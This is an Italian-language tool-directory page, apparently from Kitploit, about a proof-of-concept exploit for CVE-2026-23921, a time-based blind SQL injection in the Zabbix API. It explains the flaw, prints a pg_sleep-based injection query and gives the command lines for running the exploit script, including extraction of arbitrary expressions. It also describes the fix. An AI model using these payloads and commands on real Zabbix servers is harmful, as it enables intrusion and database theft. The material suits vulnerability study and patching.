Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-23921 — Proof-of-concept di exploit per CVE-2026-23921, un'iniezione SQL blind basata sul tempo nell'API di Zabbix tramite il parametro sortfield, che consente l'estrazione di dati dai backend PostgreSQL e MySQL. | Kitploit
Strumenti/GitHubGitHub/qucklecrabik/cve-2026-23921
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingSicurezza dei Database
GitHubqucklecrabik/cve-2026-23921

CVE-2026-23921

Proof-of-concept di exploit per CVE-2026-23921, un'iniezione SQL blind basata sul tempo nell'API di Zabbix tramite il parametro sortfield, che consente l'estrazione di dati dai backend PostgreSQL e MySQL.

Vedi Repository
131 giorno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-23921 — SQL Injection cieca basata sul tempo in Zabbix

Versioni interessate: Zabbix < 7.0.22 / < 7.2.15 / < 7.4.6
CVSS: Alto
Tipo: SQL injection cieca basata sul tempo tramite il parametro sortfield
Autenticazione richiesta: Sì (qualsiasi utente API; Super Admin evita i join sui permessi)

Vulnerabilità

I servizi API legacy di Zabbix (host.get, trigger.get, item.get, ecc.) accettano un parametro groupBy non dichiarato tramite zbx_array_merge(). In CApiService::applyQuerySortOptions(), l'array groupBy sostituisce la whitelist hardcoded utilizzata per validare . Un attaccante passa lo stesso payload SQL sia in che in — la validazione passa contro la lista controllata dall'attaccante, e il payload finisce in senza escaping.

sortfield
groupBy
sortfield
ORDER BY

Flusso dell'attacco

  1. L'attaccante invia groupBy: ["hostid,(SELECT IF(...))--"] e sortfield: "hostid,(SELECT IF(...))--" con countOutput: true
  2. zbx_array_merge preserva la chiave groupBy non dichiarata
  3. applyQuerySortOptions costruisce la whitelist da groupBy → la validazione passa
  4. applyQuerySortField concatena il payload in ORDER BY
  5. createSelectQueryFromParts costruisce la query SQL finale senza escaping

SQL risultante (PostgreSQL)

root@kitploit:~
SELECT COUNT(*) AS rowscount
FROM hosts h
WHERE h.flags IN (0,4)
ORDER BY h.hostid,(SELECT CASE WHEN ascii(substring(version() FROM 1 FOR 1))>50
                   THEN pg_sleep(3) ELSE pg_sleep(0) END)--

Utilizzo

root@kitploit:~
# Backend PostgreSQL (predefinito)
python exploit_CVE-2026-23921.py \
    --url http://TARGET/api_jsonrpc.php \
    --user Admin --password zabbix --db pgsql

# Backend MySQL
python exploit_CVE-2026-23921.py \
    --url http://TARGET/api_jsonrpc.php \
    --user Admin --password zabbix --db mysql

# Token di autenticazione esistente
python exploit_CVE-2026-23921.py \
    --url http://TARGET/api_jsonrpc.php \
    --auth <token> --db pgsql

# Estrarre un'espressione arbitraria
python exploit_CVE-2026-23921.py \
    --url ... --auth ... --db pgsql \
    --expr "current_user"

# Usare un metodo API diverso
python exploit_CVE-2026-23921.py \
    --url ... --auth ... --db mysql \
    --method trigger.get --sort-col triggerid

Correzione

Aggiornare a Zabbix 7.0.22 / 7.2.15 / 7.4.6 o versioni successive.

La patch sostituisce array_merge($options['groupBy'], ...) con array_intersect($this->sortColumns, $options['groupBy']) in modo che i valori forniti dall'attaccante non entrino mai nella whitelist. Sono stati aggiunti ulteriori controlli di tipo is_string() e is_array() come difesa in profondità.

Disclaimer

Questo strumento è destinato esclusivamente a test di sicurezza autorizzati e scopi educativi. Utilizzarlo solo contro sistemi di propria proprietà o per i quali si dispone di esplicita autorizzazione scritta ai test.

Scarica lo strumento